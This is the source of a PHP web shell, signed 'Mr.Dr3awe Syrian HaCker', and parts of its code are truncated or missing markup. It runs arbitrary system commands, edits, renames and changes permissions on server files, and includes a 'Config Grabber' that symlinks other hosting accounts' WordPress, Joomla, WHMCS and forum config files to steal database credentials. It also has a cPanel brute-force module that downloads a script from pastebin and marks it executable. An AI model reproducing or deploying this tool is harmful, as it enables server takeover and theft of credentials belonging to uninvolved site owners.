п»ї -:- Mr.Dr3awe Shell -:-
$value){ $_POST[$key] = stripslashes($value); } } /* info server */ $self=$_SERVER[\'PHP_SELF\']; $srvr_sof=$_SERVER[\'SERVER_SOFTWARE\']; $your_ip=$_SERVER[\'REMOTE_ADDR\']; $srvr_ip=$_SERVER[\'SERVER_ADDR\']; $admin=$_SERVER[\'SERVER_ADMIN\']; //////all functions disini tempatnya///// function exe($cmd) { if(function_exists(\'system\')) { @ob_start(); @system($cmd); $buff = @ob_get_contents(); @ob_end_clean(); return $buff; } elseif(function_exists(\'exec\')) { @exec($cmd,$results); $buff = \"\"; foreach($results as $result) { $buff .= $result; } return $buff; } elseif(function_exists(\'passthru\')) { @ob_start(); @passthru($cmd); $buff = @ob_get_contents(); @ob_end_clean(); return $buff; } elseif(function_exists(\'shell_exec\')) { $buff = @shell_exec($cmd); return $buff; } } function perms($file){ $perms = fileperms($file); if (($perms & 0xC000) == 0xC000) { // Socket $info = \'s\'; } elseif (($perms & 0xA000) == 0xA000) { // Symbolic Link $info = \'l\'; } elseif (($perms & 0x8000) == 0x8000) { // Regular $info = \'-\'; } elseif (($perms & 0x6000) == 0x6000) { // Block special $info = \'b\'; } elseif (($perms & 0x4000) == 0x4000) { // Directory $info = \'d\'; } elseif (($perms & 0x2000) == 0x2000) { // Character special $info = \'c\'; } elseif (($perms & 0x1000) == 0x1000) { // FIFO pipe $info = \'p\'; } else { // Unknown $info = \'u\'; } // Owner $info .= (($perms & 0x0100) ? \'r\' : \'-\'); $info .= (($perms & 0x0080) ? \'w\' : \'-\'); $info .= (($perms & 0x0040) ? (($perms & 0x0800) ? \'s\' : \'x\' ) : (($perms & 0x0800) ? \'S\' : \'-\')); // Group $info .= (($perms & 0x0020) ? \'r\' : \'-\'); $info .= (($perms & 0x0010) ? \'w\' : \'-\'); $info .= (($perms & 0x0008) ? (($perms & 0x0400) ? \'s\' : \'x\' ) : (($perms & 0x0400) ? \'S\' : \'-\')); // World $info .= (($perms & 0x0004) ? \'r\' : \'-\'); $info .= (($perms & 0x0002) ? \'w\' : \'-\'); $info .= (($perms & 0x0001) ? (($perms & 0x0200) ? \'t\' : \'x\' ) : (($perms & 0x0200) ? \'T\' : \'-\')); return $info; } function getfile($urlfile, $content) { $fp = fopen($content, \"w\"); $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $urlfile); curl_setopt($ch, CURLOPT_BINARYTRANSFER, true); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($ch, CURLOPT_FILE, $fp); return curl_exec($ch); curl_close($ch); fclose($fp); ob_flush(); flush(); } //////////////END Functions Biar Rapih//////////////////// ///////////////////ZONE-H//////////////// $zoneH=\"lVRti9s4EP4eyH+YimUdQxrvbqF3JLa5ct1Cub3dkqRf7lKC4kxisbJkJLlJWva/d+SXJu1uaWsIkUbz8swzj4RZrlm/F2eoHJo03mhTQIEu1+tkwd7dzeYLlvZ7/wpjtIExeVqUmDnIJLc2CVbarNFs+YEHoHiBFFTUvnVYrEsntEo/aYXP8zhqt3QQNWnSeGVoe6ud2KCBW8owhliosuoqLNixxIKBO5S+hsO9o10peYa5lnTu0VbO8OevnOPZPRKADtAaN+TmDVZ88oYXV4SuqfxaF1woC2O/jX1abpA/Xdu6g/ThO7F2+Rhe/vFnuZ9AjmKbuzG8uLii7UnVJrOvFHV526K/0KCtVoXwLX7ksvKGGar1MflWN/xGfl5+4dHTj036Pej3LLqlEwUupaAsMLgIyS42MHi2qVTmZ7DEvbDOwoBllZFLoYRjYfh5LZBM81xYmGVGlA4qixay99MbuBErw81hCAddQVFZB9Se41LCRhjaPatBcMgNbpIgd64cRxGvrkZlXo4UuqjgquIyQhX5miMCWZX+MEh/wzmOeMrCyUPdp2/pr7Oll+n/wVYHH8J+7zOdtB+RgzzLYYD7Uuq1b22h2BC6iHZEFAbcwlmzDY/xJ6m6r9TU6aB1PcnUSCz4cDQ114ByT45ZHo5LpIsHrJsb0UYC2aJLguVKcnUffEtjc4FGmS4ibrJcfMSorFZS2BzXyUWQ/tdeMP5VBQ1B3bg73EQlIWzR0qoB+S1rZ8RYAl9lAYPTDmozDYNuMqXL8iH8Tdq4ezdfTq/n76e38+mr29mb6+kQLn8tzJPVOR/97U44P7gjwCdmknGLwBpq2OTxrH5clP6GwFpud7vd6IRf5d+iQ2SF2kpk4W/l9c28eXt983pG6VuWk47u80Y0l4mfwnlOj1RBmkwuz0mkVqvk8sliXuKlwe2y4DUjLMq01P65M0gPQnr3T7ygV0DRU7qIpEgj0ncNEPeY1fDCMHyc9jsZtreWjZgHR3+dHGnZCJIWaWxLrtpnMKhhjGFrEFWQ+jAgLJF3SU+F+KiitPhTPE8UonbbMtdeEl2lH1RZEan3J3Y/g0q68c89H75TbSY1yawm0l+rLw== \"; /*STYLE UPIL BRO BIAR KEKINIAN*/ echo \' \'; echo\"
*-~\'`^\'*u_                                _u*\'^`\'~-*,
p!^       /  jPw                            w9j \\        ^!p
w^.._      /      \'\\_                      _/\'     \\        _.^w
*_   /          \\_       _    _      _/         \\     _* 
q /           / \\q   ( `---` )   p/ \\          \\   p
jj5****._    /    ^\\_) o  o (_/^    \\    _.****6jj
*_ /      \'==) ;; (==\'      \\ _*
`/.w***,   /(    )\\   ,***w.\\\'
^      ^c/ )    ( \\c^      ^
\'V\')_)(_(\'V\'
\"; echo \"

♥ Mr.Dr3awe Syrian HaCker ♥
\"; echo \"
[+] By Mr.Dr3awe & Ibrahin Alaan [+]

\"; /** info kernel */ echo\"
\".php_uname().\"
\".$software = getenv(\"SERVER_SOFTWARE\"); echo\"

\"; echo\"

Your IP : \".$your_ip.\" | Server IP : \".$srvr_ip.\"
\"; $disablefunctions = @ini_get(\"disable_functions\"); $echo_disablefunctions = (!empty($disablefunctions)) ? \"\".$disablefunctions.\"\" : \"Have Fun! None Functions Disabled For This Server! ~_^\"; echo \'
Disable Functions: \'.$echo_disablefunctions.\'
\'; echo \'
Your Path Location :\'; ////////////////////// //CWD MULAI DISINI// //////////////////// if(isset($_GET[\'path\'])){ $path = $_GET[\'path\']; }else{ $path = getcwd(); } $path = str_replace(\'\\\\\',\'/\',$path); $paths = explode(\'/\',$path); foreach($paths as $id=>$pat){ if($pat == \'\' && $id == 0){ $a = true; echo \'/\'; continue; } if($pat == \'\') continue; echo \'\'.$pat.\'/\'; } echo \'\'; ?>

You Are Looking : \"; echo $_GET[\'filesrc\']; echo \'\'; echo(\'

\'); break; } /* permission Dimulai Dari Sini */ elseif(isset($_GET[\'option\']) && $_POST[\'opt\'] != \'delete\'){ echo \'
\'.$_POST[\'path\'].\'

\'; if($_POST[\'opt\'] == \'chmod\'){ if(isset($_POST[\'perm\'])){ if(chmod($_POST[\'path\'],$_POST[\'perm\'])){ echo \'\'; }else{ echo \'\'; } } echo \'
Permission :
\'; }elseif($_POST[\'opt\'] == \'rename\'){ if(isset($_POST[\'newname\'])){ if(rename($_POST[\'path\'],$path.\'/\'.$_POST[\'newname\'])){ echo \'\'; }else{ echo \'\'; } $_POST[\'name\'] = $_POST[\'newname\']; } echo \'
New Name :
\'; }elseif($_POST[\'opt\'] == \'edit\'){ if(isset($_POST[\'src\'])){ $fp = fopen($_POST[\'path\'],\'w\'); if(fwrite($fp,$_POST[\'src\'])){ echo \'\'; }else{ echo \'\'; } fclose($fp); } echo \'

\'; } echo \'
\'; break; } /* Config Grabber Dimulai Dari Sini */ elseif(isset($_GET[\'x\']) && ($_GET[\'x\'] == \'grabc\')){ @ini_set(\'output_buffering\',0); echo \"
\"; echo \"
\";?>

/etc/passwd content






Symlink disabled :( \');}@mkdir(\'Mr.Dr3awe-Conf\', 0755);@chdir(\'Mr.Dr3awe-Conf\'); $htaccess=\" OPTIONS Indexes FollowSymLinks SymLinksIfOwnerMatch Includes IncludesNOEXEC ExecCGI Options Indexes FollowSymLinks ForceType text/plain AddType text/plain .php AddType text/plain .html AddType text/html .shtml AddType txt .php AddHandler server-parsed .php AddHandler txt .php AddHandler txt .html AddHandler txt .shtml Options All Options All\"; file_put_contents(\".htaccess\",$htaccess,FILE_APPEND);$passwd=$_POST[\"passwd\"]; $passwd=explode(\"\\n\",$passwd); echo \"

Kalem Ndan Lagi Di Proses...

\"; foreach($passwd as $pwd){ $pawd=explode(\":\",$pwd);$user =$pawd[0]; @symlink(\'/home/\'.$user.\'/public_html/wp-config.php\',$user.\'-wp13.txt\'); @symlink(\'/home/\'.$user.\'/public_html/wp/wp-config.php\',$user.\'-wp13-wp.txt\'); @symlink(\'/home/\'.$user.\'/public_html/WP/wp-config.php\',$user.\'-wp13-WP.txt\'); @symlink(\'/home/\'.$user.\'/public_html/wp/beta/wp-config.php\',$user.\'-wp13-wp-beta.txt\'); @symlink(\'/home/\'.$user.\'/public_html/beta/wp-config.php\',$user.\'-wp13-beta.txt\'); @symlink(\'/home/\'.$user.\'/public_html/press/wp-config.php\',$user.\'-wp13-press.txt\'); @symlink(\'/home/\'.$user.\'/public_html/wordpress/wp-config.php\',$user.\'-wp13-wordpress.txt\'); @symlink(\'/home/\'.$user.\'/public_html/Wordpress/wp-config.php\',$user.\'-wp13-Wordpress.txt\'); @symlink(\'/home/\'.$user.\'/public_html/blog/wp-config.php\',$user.\'-wp13-Wordpress.txt\'); @symlink(\'/home/\'.$user.\'/public_html/config.php\',$user.\'-configgg.txt\'); @symlink(\'/home/\'.$user.\'/public_html/news/wp-config.php\',$user.\'-wp13-news.txt\'); @symlink(\'/home/\'.$user.\'/public_html/new/wp-config.php\',$user.\'-wp13-new.txt\'); @symlink(\'/home/\'.$user.\'/public_html/blog/wp-config.php\',$user.\'-wp-blog.txt\'); @symlink(\'/home/\'.$user.\'/public_html/beta/wp-config.php\',$user.\'-wp-beta.txt\'); @symlink(\'/home/\'.$user.\'/public_html/blogs/wp-config.php\',$user.\'-wp-blogs.txt\'); @symlink(\'/home/\'.$user.\'/public_html/home/wp-config.php\',$user.\'-wp-home.txt\'); @symlink(\'/home/\'.$user.\'/public_html/db.php\',$user.\'-dbconf.txt\'); @symlink(\'/home/\'.$user.\'/public_html/site/wp-config.php\',$user.\'-wp-site.txt\'); @symlink(\'/home/\'.$user.\'/public_html/main/wp-config.php\',$user.\'-wp-main.txt\'); @symlink(\'/home/\'.$user.\'/public_html/configuration.php\',$user.\'-wp-test.txt\'); @symlink(\'/home/\'.$user.\'/public_html/joomla/configuration.php\',$user.\'-joomla2.txt\'); @symlink(\'/home/\'.$user.\'/public_html/portal/configuration.php\',$user.\'-joomla-protal.txt\'); @symlink(\'/home/\'.$user.\'/public_html/joo/configuration.php\',$user.\'-joo.txt\'); @symlink(\'/home/\'.$user.\'/public_html/cms/configuration.php\',$user.\'-joomla-cms.txt\'); @symlink(\'/home/\'.$user.\'/public_html/site/configuration.php\',$user.\'-joomla-site.txt\'); @symlink(\'/home/\'.$user.\'/public_html/main/configuration.php\',$user.\'-joomla-main.txt\'); @symlink(\'/home/\'.$user.\'/public_html/news/configuration.php\',$user.\'-joomla-news.txt\'); @symlink(\'/home/\'.$user.\'/public_html/new/configuration.php\',$user.\'-joomla-new.txt\'); @symlink(\'/home/\'.$user.\'/public_html/home/configuration.php\',$user.\'-joomla-home.txt\'); @symlink(\'/home/\'.$user.\'/public_html/vb/includes/config.php\',$user.\'-vb-config.txt\'); @symlink(\'/home/\'.$user.\'/public_html/whm/configuration.php\',$user.\'-whm15.txt\'); @symlink(\'/home/\'.$user.\'/public_html/central/configuration.php\',$user.\'-whm-central.txt\'); @symlink(\'/home/\'.$user.\'/public_html/whm/whmcs/configuration.php\',$user.\'-whm-whmcs.txt\'); @symlink(\'/home/\'.$user.\'/public_html/whm/WHMCS/configuration.php\',$user.\'-whm-WHMCS.txt\'); @symlink(\'/home/\'.$user.\'/public_html/whmc/WHM/configuration.php\',$user.\'-whmc-WHM.txt\'); @symlink(\'/home/\'.$user.\'/public_html/whmcs/configuration.php\',$user.\'-whmcs.txt\'); @symlink(\'/home/\'.$user.\'/public_html/support/configuration.php\',$user.\'-support.txt\'); @symlink(\'/home/\'.$user.\'/public_html/configuration.php\',$user.\'-joomla.txt\'); @symlink(\'/home/\'.$user.\'/public_html/submitticket.php\',$user.\'-whmcs2.txt\'); @symlink(\'/home/\'.$user.\'/public_html/whm/configuration.php\',$user.\'-whm.txt\');} echo \'Selesai Bos Q, Monggo >> Hajar Config\';} break; } /////// Cukup Sampai Disini ya Grabber :( //////// ///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// ///////////////////////////////////////////////START OF ALL CPANEL TOOLS///////////////////////////////////////////////////////////////////// ///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// /// start cpanel brute elseif(isset($_GET[\'x\']) && ($_GET[\'x\'] == \'brute\')) { ?>
&x=brute\" method=\"post\"> $user) Password is ($pass)
\"; $ok++; } } } } echo \"
You Found $ok By Mr.Dr3awe\"; echo \"
BACK\"; exit; } } if($_POST[\'pass\']==\'password\'){ @error_reporting(0); $i = getenv(\'REMOTE_ADDR\'); $d = date(\'D, M jS, Y H:i\',time()); $h = $_SERVER[\'HTTP_HOST\']; $dir=$_SERVER[\'PHP_SELF\']; mkdir(\'config\',0755); $cp = file_get_contents(\"http://pastebin.com/raw/0YG2dZ98\"); $file = fopen(\"cp.py\",\"w+\"); $write = fwrite ($file ,$cp); fclose($file); chmod(\"cp.py\",0755); $url = $_POST[\'url\']; echo\"
\"; echo \"
BACK\"; exit; } if($_POST[\'mendapatkan\']==\'passwd\'){ @set_magic_quotes_runtime(0); ob_start(); error_reporting(0); @set_time_limit(0); @ini_set(\'max_execution_time\',0); @ini_set(\'output_buffering\',0); $fn = $_POST[\'foldername\']; //all function here function syml($usern,$pdomain) { symlink(\'/home/\'.$usern.\'/public_html/vb/includes/config.php\',$pdomain.\'~~vBulletin1.txt\'); symlink(\'/home/\'.$usern.\'/public_html/includes/config.php\',$pdomain.\'~~vBulletin2.txt\'); symlink(\'/home/\'.$usern.\'/public_html/forum/includes/config.php\',$pdomain.\'~~vBulletin3.txt\'); symlink(\'/home/\'.$usern.\'/public_html/cc/includes/config.php\',$pdomain.\'~~vBulletin4.txt\'); symlink(\'/home/\'.$usern.\'/public_html/config.php\',$pdomain.\'~~Phpbb1.txt\'); symlink(\'/home/\'.$usern.\'/public_html/forum/includes/config.php\',$pdomain.\'~~Phpbb2.txt\'); symlink(\'/home/\'.$usern.\'/public_html/wp-config.php\',$pdomain.\'~~Wordpress1.txt\'); symlink(\'/home/\'.$usern.\'/public_html/blog/wp-config.php\',$pdomain.\'~~Wordpress2.txt\'); symlink(\'/home/\'.$usern.\'/public_html/configuration.php\',$pdomain.\'~~Joomla1.txt\'); symlink(\'/home/\'.$usern.\'/public_html/blog/configuration.php\',$pdomain.\'~~Joomla2.txt\'); symlink(\'/home/\'.$usern.\'/public_html/joomla/configuration.php\',$pdomain.\'~~Joomla3.txt\'); symlink(\'/home/\'.$usern.\'/public_html/whm/configuration.php\',$pdomain.\'~~Whm1.txt\'); symlink(\'/home/\'.$usern.\'/public_html/whmc/configuration.php\',$pdomain.\'~~Whm2.txt\'); symlink(\'/home/\'.$usern.\'/public_html/support/configuration.php\',$pdomain.\'~~Whm3.txt\'); symlink(\'/home/\'.$usern.\'/public_html/client/configuration.php\',$pdomain.\'~~Whm4.txt\'); symlink(\'/home/\'.$usern.\'/public_html/billings/configuration.php\',$pdomain.\'~~Whm5.txt\'); symlink(\'/home/\'.$usern.\'/public_html/billing/configuration.php\',$pdomain.\'~~Whm6.txt\'); symlink(\'/home/\'.$usern.\'/public_html/clients/configuration.php\',$pdomain.\'~~Whm7.txt\'); symlink(\'/home/\'.$usern.\'/public_html/whmcs/configuration.php\',$pdomain.\'~~Whm8.txt\'); symlink(\'/home/\'.$usern.\'/public_html/order/configuration.php\',$pdomain.\'~~Whm9.txt\'); symlink(\'/home/\'.$usern.\'/public_html/admin/conf.php\',$pdomain.\'~~5.txt\'); symlink(\'/home/\'.$usern.\'/public_html/admin/config.php\',$pdomain.\'~~4.txt\'); symlink(\'/home/\'.$usern.\'/public_html/conf_global.php\',$pdomain.\'~~invisio.txt\'); symlink(\'/home/\'.$usern.\'/public_html/include/db.php\',$pdomain.\'~~7.txt\'); symlink(\'/home/\'.$usern.\'/public_html/connect.php\',$pdomain.\'~~8.txt\'); symlink(\'/home/\'.$usern.\'/public_html/mk_conf.php\',$pdomain.\'~~mk-portale1.txt\'); symlink(\'/home/\'.$usern.\'/public_html/include/config.php\',$pdomain.\'~~12.txt\'); symlink(\'/home/\'.$usern.\'/public_html/settings.php\',$pdomain.\'~~Smf.txt\'); symlink(\'/home/\'.$usern.\'/public_html/includes/functions.php\',$pdomain.\'~~phpbb3.txt\'); symlink(\'/home/\'.$usern.\'/public_html/include/db.php\',$pdomain.\'~~infinity.txt\'); symlink(\'/home2/\'.$usern.\'/public_html/vb/includes/config.php\',$pdomain.\'~~vBulletin1.txt\'); symlink(\'/home2/\'.$usern.\'/public_html/includes/config.php\',$pdomain.\'~~vBulletin2.txt\'); symlink(\'/home2/\'.$usern.\'/public_html/forum/includes/config.php\',$pdomain.\'~~vBulletin3.txt\'); symlink(\'/home2/\'.$usern.\'/public_html/cc/includes/config.php\',$pdomain.\'~~vBulletin4.txt\'); symlink(\'/home2/\'.$usern.\'/public_html/config.php\',$pdomain.\'~~Phpbb1.txt\'); symlink(\'/home2/\'.$usern.\'/public_html/forum/includes/config.php\',$pdomain.\'~~Phpbb2.txt\'); symlink(\'/home2/\'.$usern.\'/public_html/wp-config.php\',$pdomain.\'~~Wordpress1.txt\'); symlink(\'/home2/\'.$usern.\'/public_html/blog/wp-config.php\',$pdomain.\'~~Wordpress2.txt\'); symlink(\'/home2/\'.$usern.\'/public_html/configuration.php\',$pdomain.\'~~Joomla1.txt\'); symlink(\'/home2/\'.$usern.\'/public_html/blog/configuration.php\',$pdomain.\'~~Joomla2.txt\'); symlink(\'/home2/\'.$usern.\'/public_html/joomla/configuration.php\',$pdomain.\'~~Joomla3.txt\'); symlink(\'/home2/\'.$usern.\'/public_html/whm/configuration.php\',$pdomain.\'~~Whm1.txt\'); symlink(\'/home2/\'.$usern.\'/public_html/whmc/configuration.php\',$pdomain.\'~~Whm2.txt\'); symlink(\'/home2/\'.$usern.\'/public_html/support/configuration.php\',$pdomain.\'~~Whm3.txt\'); symlink(\'/home2/\'.$usern.\'/public_html/client/configuration.php\',$pdomain.\'~~Whm4.txt\'); symlink(\'/home2/\'.$usern.\'/public_html/billings/configuration.php\',$pdomain.\'~~Whm5.txt\'); symlink(\'/home2/\'.$usern.\'/public_html/billing/configuration.php\',$pdomain.\'~~Whm6.txt\'); symlink(\'/home2/\'.$usern.\'/public_html/clients/configuration.php\',$pdomain.\'~~Whm7.txt\'); symlink(\'/home2/\'.$usern.\'/public_html/whmcs/configuration.php\',$pdomain.\'~~Whm8.txt\'); symlink(\'/home2/\'.$usern.\'/public_html/order/configuration.php\',$pdomain.\'~~Whm9.txt\'); symlink(\'/home2/\'.$usern.\'/public_html/admin/conf.php\',$pdomain.\'~~5.txt\'); symlink(\'/home2/\'.$usern.\'/public_html/admin/config.php\',$pdomain.\'~~4.txt\'); symlink(\'/home2/\'.$usern.\'/public_html/conf_global.php\',$pdomain.\'~~invisio.txt\'); symlink(\'/home2/\'.$usern.\'/public_html/include/db.php\',$pdomain.\'~~7.txt\'); symlink(\'/home2/\'.$usern.\'/public_html/connect.php\',$pdomain.\'~~8.txt\'); symlink(\'/home2/\'.$usern.\'/public_html/mk_conf.php\',$pdomain.\'~~mk-portale1.txt\'); symlink(\'/home2/\'.$usern.\'/public_html/include/config.php\',$pdomain.\'~~12.txt\'); symlink(\'/home2/\'.$usern.\'/public_html/settings.php\',$pdomain.\'~~Smf.txt\'); symlink(\'/home2/\'.$usern.\'/public_html/includes/functions.php\',$pdomain.\'~~phpbb3.txt\'); symlink(\'/home2/\'.$usern.\'/public_html/include/db.php\',$pdomain.\'~~infinity.txt\'); symlink(\'/home3/\'.$usern.\'/public_html/vb/includes/config.php\',$pdomain.\'~~vBulletin1.txt\'); symlink(\'/home3/\'.$usern.\'/public_html/includes/config.php\',$pdomain.\'~~vBulletin2.txt\'); symlink(\'/home3/\'.$usern.\'/public_html/forum/includes/config.php\',$pdomain.\'~~vBulletin3.txt\'); symlink(\'/home3/\'.$usern.\'/public_html/cc/includes/config.php\',$pdomain.\'~~vBulletin4.txt\'); symlink(\'/home3/\'.$usern.\'/public_html/config.php\',$pdomain.\'~~Phpbb1.txt\'); symlink(\'/home3/\'.$usern.\'/public_html/forum/includes/config.php\',$pdomain.\'~~Phpbb2.txt\'); symlink(\'/home3/\'.$usern.\'/public_html/wp-config.php\',$pdomain.\'~~Wordpress1.txt\'); symlink(\'/home3/\'.$usern.\'/public_html/blog/wp-config.php\',$pdomain.\'~~Wordpress2.txt\'); symlink(\'/home3/\'.$usern.\'/public_html/configuration.php\',$pdomain.\'~~Joomla1.txt\'); symlink(\'/home3/\'.$usern.\'/public_html/blog/configuration.php\',$pdomain.\'~~Joomla2.txt\'); symlink(\'/home3/\'.$usern.\'/public_html/joomla/configuration.php\',$pdomain.\'~~Joomla3.txt\'); symlink(\'/home3/\'.$usern.\'/public_html/whm/configuration.php\',$pdomain.\'~~Whm1.txt\'); symlink(\'/home3/\'.$usern.\'/public_html/whmc/configuration.php\',$pdomain.\'~~Whm2.txt\'); symlink(\'/home3/\'.$usern.\'/public_html/support/configuration.php\',$pdomain.\'~~Whm3.txt\'); symlink(\'/home3/\'.$usern.\'/public_html/client/configuration.php\',$pdomain.\'~~Whm4.txt\'); symlink(\'/home3/\'.$usern.\'/public_html/billings/configuration.php\',$pdomain.\'~~Whm5.txt\'); symlink(\'/home3/\'.$usern.\'/public_html/billing/configuration.php\',$pdomain.\'~~Whm6.txt\'); symlink(\'/home3/\'.$usern.\'/public_html/clients/configuration.php\',$pdomain.\'~~Whm7.txt\'); symlink(\'/home3/\'.$usern.\'/public_html/whmcs/configuration.php\',$pdomain.\'~~Whm8.txt\'); symlink(\'/home3/\'.$usern.\'/public_html/order/configuration.php\',$pdomain.\'~~Whm9.txt\'); symlink(\'/home3/\'.$usern.\'/public_html/admin/conf.php\',$pdomain.\'~~5.txt\'); symlink(\'/home3/\'.$usern.\'/public_html/admin/config.php\',$pdomain.\'~~4.txt\'); symlink(\'/home3/\'.$usern.\'/public_html/conf_global.php\',$pdomain.\'~~invisio.txt\'); symlink(\'/home3/\'.$usern.\'/public_html/include/db.php\',$pdomain.\'~~7.txt\'); symlink(\'/home3/\'.$usern.\'/public_html/connect.php\',$pdomain.\'~~8.txt\'); symlink(\'/home3/\'.$usern.\'/public_html/mk_conf.php\',$pdomain.\'~~mk-portale1.txt\'); symlink(\'/home3/\'.$usern.\'/public_html/include/config.php\',$pdomain.\'~~12.txt\'); symlink(\'/home3/\'.$usern.\'/public_html/settings.php\',$pdomain.\'~~Smf.txt\'); symlink(\'/home3/\'.$usern.\'/public_html/includes/functions.php\',$pdomain.\'~~phpbb3.txt\'); symlink(\'/home3/\'.$usern.\'/public_html/include/db.php\',$pdomain.\'~~infinity.txt\'); symlink(\'/home4/\'.$usern.\'/public_html/vb/includes/config.php\',$pdomain.\'~~vBulletin1.txt\'); symlink(\'/home4/\'.$usern.\'/public_html/includes/config.php\',$pdomain.\'~~vBulletin2.txt\'); symlink(\'/home4/\'.$usern.\'/public_html/forum/includes/config.php\',$pdomain.\'~~vBulletin3.txt\'); symlink(\'/home4/\'.$usern.\'/public_html/cc/includes/config.php\',$pdomain.\'~~vBulletin4.txt\'); symlink(\'/home4/\'.$usern.\'/public_html/config.php\',$pdomain.\'~~Phpbb1.txt\'); symlink(\'/home4/\'.$usern.\'/public_html/forum/includes/config.php\',$pdomain.\'~~Phpbb2.txt\'); symlink(\'/home4/\'.$usern.\'/public_html/wp-config.php\',$pdomain.\'~~Wordpress1.txt\'); symlink(\'/home4/\'.$usern.\'/public_html/blog/wp-config.php\',$pdomain.\'~~Wordpress2.txt\'); symlink(\'/home4/\'.$usern.\'/public_html/configuration.php\',$pdomain.\'~~Joomla1.txt\'); symlink(\'/home4/\'.$usern.\'/public_html/blog/configuration.php\',$pdomain.\'~~Joomla2.txt\'); symlink(\'/home4/\'.$usern.\'/public_html/joomla/configuration.php\',$pdomain.\'~~Joomla3.txt\'); symlink(\'/home4/\'.$usern.\'/public_html/whm/configuration.php\',$pdomain.\'~~Whm1.txt\'); symlink(\'/home4/\'.$usern.\'/public_html/whmc/configuration.php\',$pdomain.\'~~Whm2.txt\'); symlink(\'/home4/\'.$usern.\'/public_html/support/configuration.php\',$pdomain.\'~~Whm3.txt\'); symlink(\'/home4/\'.$usern.\'/public_html/client/configuration.php\',$pdomain.\'~~Whm4.txt\'); symlink(\'/home4/\'.$usern.\'/public_html/billings/configuration.php\',$pdomain.\'~~Whm5.txt\'); symlink(\'/home4/\'.$usern.\'/public_html/billing/configuration.php\',$pdomain.\'~~Whm6.txt\'); symlink(\'/home4/\'.$usern.\'/public_html/clients/configuration.php\',$pdomain.\'~~Whm7.txt\'); symlink(\'/home4/\'.$usern.\'/public_html/whmcs/configuration.php\',$pdomain.\'~~Whm8.txt\'); symlink(\'/home4/\'.$usern.\'/public_html/order/configuration.php\',$pdomain.\'~~Whm9.txt\'); symlink(\'/home4/\'.$usern.\'/public_html/admin/conf.php\',$pdomain.\'~~5.txt\'); symlink(\'/home4/\'.$usern.\'/public_html/admin/config.php\',$pdomain.\'~~4.txt\'); symlink(\'/home4/\'.$usern.\'/public_html/conf_global.php\',$pdomain.\'~~invisio.txt\'); symlink(\'/home4/\'.$usern.\'/public_html/include/db.php\',$pdomain.\'~~7.txt\'); symlink(\'/home4/\'.$usern.\'/public_html/connect.php\',$pdomain.\'~~8.txt\'); symlink(\'/home4/\'.$usern.\'/public_html/mk_conf.php\',$pdomain.\'~~mk-portale1.txt\'); symlink(\'/home4/\'.$usern.\'/public_html/include/config.php\',$pdomain.\'~~12.txt\'); symlink(\'/home4/\'.$usern.\'/public_html/settings.php\',$pdomain.\'~~Smf.txt\'); symlink(\'/home4/\'.$usern.\'/public_html/includes/functions.php\',$pdomain.\'~~phpbb3.txt\'); symlink(\'/home4/\'.$usern.\'/public_html/include/db.php\',$pdomain.\'~~infinity.txt\'); symlink(\'/home5/\'.$usern.\'/public_html/vb/includes/config.php\',$pdomain.\'~~vBulletin1.txt\'); symlink(\'/home5/\'.$usern.\'/public_html/includes/config.php\',$pdomain.\'~~vBulletin2.txt\'); symlink(\'/home5/\'.$usern.\'/public_html/forum/includes/config.php\',$pdomain.\'~~vBulletin3.txt\'); symlink(\'/home5/\'.$usern.\'/public_html/cc/includes/config.php\',$pdomain.\'~~vBulletin4.txt\'); symlink(\'/home5/\'.$usern.\'/public_html/config.php\',$pdomain.\'~~Phpbb1.txt\'); symlink(\'/home5/\'.$usern.\'/public_html/forum/includes/config.php\',$pdomain.\'~~Phpbb2.txt\'); symlink(\'/home5/\'.$usern.\'/public_html/wp-config.php\',$pdomain.\'~~Wordpress1.txt\'); symlink(\'/home5/\'.$usern.\'/public_html/blog/wp-config.php\',$pdomain.\'~~Wordpress2.txt\'); symlink(\'/home5/\'.$usern.\'/public_html/configuration.php\',$pdomain.\'~~Joomla1.txt\'); symlink(\'/home5/\'.$usern.\'/public_html/blog/configuration.php\',$pdomain.\'~~Joomla2.txt\'); symlink(\'/home5/\'.$usern.\'/public_html/joomla/configuration.php\',$pdomain.\'~~Joomla3.txt\'); symlink(\'/home5/\'.$usern.\'/public_html/whm/configuration.php\',$pdomain.\'~~Whm1.txt\'); symlink(\'/home5/\'.$usern.\'/public_html/whmc/configuration.php\',$pdomain.\'~~Whm2.txt\'); symlink(\'/home5/\'.$usern.\'/public_html/support/configuration.php\',$pdomain.\'~~Whm3.txt\'); symlink(\'/home5/\'.$usern.\'/public_html/client/configuration.php\',$pdomain.\'~~Whm4.txt\'); symlink(\'/home5/\'.$usern.\'/public_html/billings/configuration.php\',$pdomain.\'~~Whm5.txt\'); symlink(\'/home5/\'.$usern.\'/public_html/billing/configuration.php\',$pdomain.\'~~Whm6.txt\'); symlink(\'/home5/\'.$usern.\'/public_html/clients/configuration.php\',$pdomain.\'~~Whm7.txt\'); symlink(\'/home5/\'.$usern.\'/public_html/whmcs/configuration.php\',$pdomain.\'~~Whm8.txt\'); symlink(\'/home5/\'.$usern.\'/public_html/order/configuration.php\',$pdomain.\'~~Whm9.txt\'); symlink(\'/home5/\'.$usern.\'/public_html/admin/conf.php\',$pdomain.\'~~5.txt\'); symlink(\'/home5/\'.$usern.\'/public_html/admin/config.php\',$pdomain.\'~~4.txt\'); symlink(\'/home5/\'.$usern.\'/public_html/conf_global.php\',$pdomain.\'~~invisio.txt\'); symlink(\'/home5/\'.$usern.\'/public_html/include/db.php\',$pdomain.\'~~7.txt\'); symlink(\'/home5/\'.$usern.\'/public_html/connect.php\',$pdomain.\'~~8.txt\'); symlink(\'/home5/\'.$usern.\'/public_html/mk_conf.php\',$pdomain.\'~~mk-portale1.txt\'); symlink(\'/home5/\'.$usern.\'/public_html/include/config.php\',$pdomain.\'~~12.txt\'); symlink(\'/home5/\'.$usern.\'/public_html/settings.php\',$pdomain.\'~~Smf.txt\'); symlink(\'/home5/\'.$usern.\'/public_html/includes/functions.php\',$pdomain.\'~~phpbb3.txt\'); symlink(\'/home5/\'.$usern.\'/public_html/include/db.php\',$pdomain.\'~~infinity.txt\'); symlink(\'/home6/\'.$usern.\'/public_html/vb/includes/config.php\',$pdomain.\'~~vBulletin1.txt\'); symlink(\'/home6/\'.$usern.\'/public_html/includes/config.php\',$pdomain.\'~~vBulletin2.txt\'); 